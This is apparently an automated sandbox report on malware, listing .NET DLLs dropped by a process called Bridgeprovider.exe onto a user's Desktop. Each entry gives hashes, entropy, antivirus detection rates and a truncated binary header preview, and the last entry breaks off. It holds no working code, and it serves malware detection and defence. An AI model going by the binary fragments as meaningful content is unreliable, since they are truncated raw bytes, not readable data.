                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):50176
                                                                                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\EjOumJqe.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\HcddYGcd.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\IIxTfkxV.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                                                                                  C:\Users\user\Desktop\IZEltFrY.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\KbrUPpvT.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\OIKLmzcP.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32256
                                                                                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\OShKWlwM.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):41472
                                                                                                                                                                                                  Entropy (8bit):5.6808219961645605
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                                                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                                                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                                                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                                                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\QLwtIihK.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38400
                                                                                                                                                                                                  Entropy (8bit):5.699005826018714
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\UBnkPfhE.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):40448
                                                                                                                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\UtDRkwHy.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28160
                                                                                                                                                                                                  Entropy (8bit):5.570953308352568
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                                                                                                  MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                                                                                                  SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                                                                                                  SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                                                                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\bjHzibbh.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33280
                                                                                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\brrRNKBn.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):64000
                                                                                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\fZypqYbb.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34816
                                                                                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\hbkYLHfW.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                                                  C:\Users\user\Desktop\mFfXERcN.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\quigFLkP.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
